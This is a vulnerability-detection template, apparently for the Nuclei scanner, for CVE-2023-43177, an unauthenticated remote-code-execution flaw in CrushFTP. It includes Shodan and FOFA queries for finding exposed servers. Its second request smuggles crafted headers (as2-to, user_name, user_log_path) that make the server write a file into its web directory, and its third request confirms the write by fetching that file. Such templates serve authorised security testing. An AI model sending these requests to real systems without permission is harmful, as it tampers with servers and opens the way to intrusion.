id: CVE-2023-43177 info: name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-43177 - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/ - https://blog.projectdiscovery.io/crushftp-rce/ - https://github.com/the-emmons/CVE-Disclosures/blob/main/Pending/CrushFTP-2023-1.md - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-43177 cwe-id: CWE-913 epss-score: 0.96402 epss-percentile: 0.99567 cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: crushftp product: crushftp shodan-query: http.html:"crushftp" fofa-query: body="crushftp" tags: cve,cve2023,crushftp,unauth,rce,intrusive flow: http(1) && http(2) && http(3) variables: dirname: "{{randbase(5)}}" filename: "{{randbase(5)}}" http: - method: GET path: - "{{BaseURL}}/WebInterface" matchers: - type: dsl internal: true dsl: - contains_all(to_lower(header), "currentauth", "crushauth") - method: POST path: - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}" headers: Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}" as2-to: X user_name: crushadmin{{dirname}} user_log_path: "./WebInterface/{{dirname}}/" user_log_file: "{{filename}}" Content-Type: application/x-www-form-urlencoded body: | post=body matchers: - type: regex regex: - "crushadmin" - method: GET path: - "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}" matchers: - type: dsl dsl: - status_code == 200 - contains(body, "crushadmin{{dirname}}") condition: and # digest: 4a0a00473045022100e013ea63ca1f07dde63ec297ffbbd1f37e560231c1396d3dd07debcc39e7a17502202b87f70d993704c3d894534a22f376c9b0e545474adef184c0f7ca697a37708b:922c64590222798bb761d5b6d8e72950